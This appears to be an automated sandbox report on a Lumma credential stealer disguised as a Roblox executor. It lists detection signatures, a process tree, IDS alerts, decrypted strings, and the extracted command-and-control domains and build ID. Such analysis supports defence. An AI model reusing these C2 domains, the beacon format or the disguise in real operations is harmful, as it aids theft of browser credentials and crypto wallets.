Edit tour

Windows Analysis Report
Solara-Roblox-Executor-v3.exe

Overview

General Information

Sample name:	Solara-Roblox-Executor-v3.exe
Analysis ID:	1582867
MD5:	d2b09b1bda10143724a24534e31d44db
SHA1:	6838edf7603b3a2be8195f5029223c808cdde9a4
SHA256:	0336d6c3b8629f426c417a0999b65f74e804d11b28412482d72a004a9c6019a1
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Solara-Roblox-Executor-v3.exe (PID: 5344 cmdline: "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe" MD5: D2B09B1BDA10143724A24534E31D44DB)

conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Solara-Roblox-Executor-v3.exe (PID: 3136 cmdline: "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe" MD5: D2B09B1BDA10143724A24534E31D44DB)

Solara-Roblox-Executor-v3.exe (PID: 5696 cmdline: "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe" MD5: D2B09B1BDA10143724A24534E31D44DB)

Solara-Roblox-Executor-v3.exe (PID: 4324 cmdline: "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe" MD5: D2B09B1BDA10143724A24534E31D44DB)

Solara-Roblox-Executor-v3.exe (PID: 2828 cmdline: "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe" MD5: D2B09B1BDA10143724A24534E31D44DB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["nearycrepso.shop", "fancywaxxers.shop", "cloudewahsj.shop", "noisycuttej.shop", "abruptyopsn.shop", "wholersorie.shop", "rabidcowse.shop", "framekgirus.shop", "tirepublicerj.shop"], "Build id": "yau6Na--899083440"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000003.2093656620.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Solara-Roblox-Executor-v3.exe PID: 2828	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Solara-Roblox-Executor-v3.exe PID: 2828	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Solara-Roblox-Executor-v3.exe PID: 2828	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:23:06.923281+0100	2028371	3	Unknown Traffic	192.168.2.5	49704	104.21.96.1	443	TCP
2024-12-31T17:23:08.463581+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	104.21.96.1	443	TCP
2024-12-31T17:23:09.664220+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	104.21.96.1	443	TCP
2024-12-31T17:23:10.741890+0100	2028371	3	Unknown Traffic	192.168.2.5	49707	104.21.96.1	443	TCP
2024-12-31T17:23:12.278928+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	104.21.96.1	443	TCP
2024-12-31T17:23:13.856635+0100	2028371	3	Unknown Traffic	192.168.2.5	49709	104.21.96.1	443	TCP
2024-12-31T17:23:15.337203+0100	2028371	3	Unknown Traffic	192.168.2.5	49710	104.21.96.1	443	TCP
2024-12-31T17:23:18.415376+0100	2028371	3	Unknown Traffic	192.168.2.5	49711	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:23:07.532015+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49704	104.21.96.1	443	TCP
2024-12-31T17:23:08.907058+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49705	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:23:07.532015+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49704	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:23:08.907058+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49705	104.21.96.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:23:06.923281+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49704	104.21.96.1	443	TCP
2024-12-31T17:23:08.463581+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49705	104.21.96.1	443	TCP
2024-12-31T17:23:09.664220+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49706	104.21.96.1	443	TCP
2024-12-31T17:23:10.741890+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49707	104.21.96.1	443	TCP
2024-12-31T17:23:12.278928+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49708	104.21.96.1	443	TCP
2024-12-31T17:23:13.856635+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49709	104.21.96.1	443	TCP
2024-12-31T17:23:15.337203+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49710	104.21.96.1	443	TCP
2024-12-31T17:23:18.415376+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49711	104.21.96.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:23:06.437136+0100	2058656	1	Domain Observed Used for C2 Detected	192.168.2.5	57343	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:23:14.427599+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49709	104.21.96.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://fancywaxxers.shop/api/(b	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/i	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apiPS	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/api#	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apiO	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/C1	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/y	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/C	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/a	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/q	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/0	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop:443/api	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/141638	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["nearycrepso.shop", "fancywaxxers.shop", "cloudewahsj.shop", "noisycuttej.shop", "abruptyopsn.shop", "wholersorie.shop", "rabidcowse.shop", "framekgirus.shop", "tirepublicerj.shop"], "Build id": "yau6Na--899083440"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 94.9% probability

Machine Learning detection for sample

Source: Solara-Roblox-Executor-v3.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fancywaxxers.shop
Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: yau6Na--899083440

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Code function: 6_2_0041726D CryptUnprotectData,

6_2_0041726D

Source: Solara-Roblox-Executor-v3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49710 version: TLS 1.2

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 0_2_0030B6E8 FindFirstFileExW,	0_2_0030B6E8
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 0_2_0030B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_0030B799
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 3_2_0030B6E8 FindFirstFileExW,	3_2_0030B6E8
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 3_2_0030B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_0030B799

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 6E87DD67h	6_2_0043A940
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax-40h]	6_2_0043E910
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov edx, ecx	6_2_0040DA95
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx+02h]	6_2_00426470
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov eax, ebx	6_2_004374E0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov esi, eax	6_2_004374E0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp word ptr [edi+edx], 0000h	6_2_00417058
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 24D673BAh	6_2_0043B060
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov edx, eax	6_2_00426800
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	6_2_00422810
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+4B908401h]	6_2_00426820
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+50h]	6_2_00426820
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+50h]	6_2_00426820
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+00000088h]	6_2_004160E7
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+00000088h]	6_2_004160E7
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp dword ptr [esi+eax*8], 385488F2h	6_2_004160E7
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-5Ch]	6_2_0043C8EF
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+08h]	6_2_0041A0F0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov ecx, eax	6_2_0041C8B0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov ecx, eax	6_2_004240B0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov dword ptr [esp+00000BE0h], CEC9C0CBh	6_2_004240B0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov word ptr [edx], ax	6_2_00417957
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov byte ptr [esi], al	6_2_0042D109
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov ecx, eax	6_2_00422130
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+02h]	6_2_00422130
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp dword ptr [esi+ecx*8], 344CE4E0h	6_2_0041993B
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edx]	6_2_00425A00
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov ecx, eax	6_2_00424200
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov dword ptr [esp+00000BE0h], CEC9C0CBh	6_2_00424200
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov byte ptr [edi], cl	6_2_0042C20F
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov ecx, eax	6_2_0042C20F
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-08h]	6_2_0043B210
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-08h]	6_2_0043B210
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h	6_2_0043B210
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000FDh]	6_2_0043DAC5
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	6_2_0042A2E0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	6_2_00420A90
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edi, byte ptr [eax+esi]	6_2_00402B40
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov ecx, eax	6_2_0042635C
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov ecx, eax	6_2_0042C20A
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then jmp dword ptr [0044480Ch]	6_2_00415B6C
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000208h]	6_2_0040D32F
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	6_2_004073A0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	6_2_004073A0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov word ptr [edi], cx	6_2_0041644B
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+08D8A46Eh]	6_2_0041644B
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	6_2_00434C50
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edx, cx	6_2_0042D479
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov word ptr [eax], cx	6_2_00428423
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp dword ptr [esi+eax*8], 385488F2h	6_2_00417CC7
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+08D8A46Eh]	6_2_00416CC8
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+1Ch]	6_2_00421D50
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4B1BF3DAh	6_2_00437D00
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	6_2_00437D00
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edi+1B0B6431h]	6_2_00408DE0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	6_2_004255F0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 344CE4E0h	6_2_00417582
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h	6_2_00422D94
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0000026Ch]	6_2_0042C5AC
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov ecx, eax	6_2_00423DB0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov dword ptr [esp+00000BE0h], CEC9C0CBh	6_2_00423DB0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov edi, dword ptr [esp+2Ch]	6_2_00423DB0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+50h]	6_2_00426DB6
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+50h]	6_2_00426DB6
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then jmp eax	6_2_00426DB6
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 3D17632Eh	6_2_0043AE40
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov byte ptr [edi], cl	6_2_0041E660
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0000026Ch]	6_2_0042C569
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0000026Ch]	6_2_0042C600
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov edx, ecx	6_2_0043E630
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov dword ptr [esp+28h], 5C445E58h	6_2_004296D5
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+28h]	6_2_00416ED8
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+28h]	6_2_00416ED8
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx eax, word ptr [ebp+00h]	6_2_004386F9
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	6_2_00414EA0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+4E024047h]	6_2_0040C6B5
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov byte ptr [edi], al	6_2_00417F48
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then mov ecx, edx	6_2_00437F50
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h	6_2_00437F50
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp dword ptr [edx+ebx*8], 31E2A9F4h	6_2_00437F50
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then test eax, eax	6_2_00437F50
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then cmp edi, esi	6_2_00437F50
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-3BDB79C9h]	6_2_0041C7A2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.5:57343 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49709 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49704 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49711 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49710 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49708 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49705 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49707 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49706 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.96.1:443

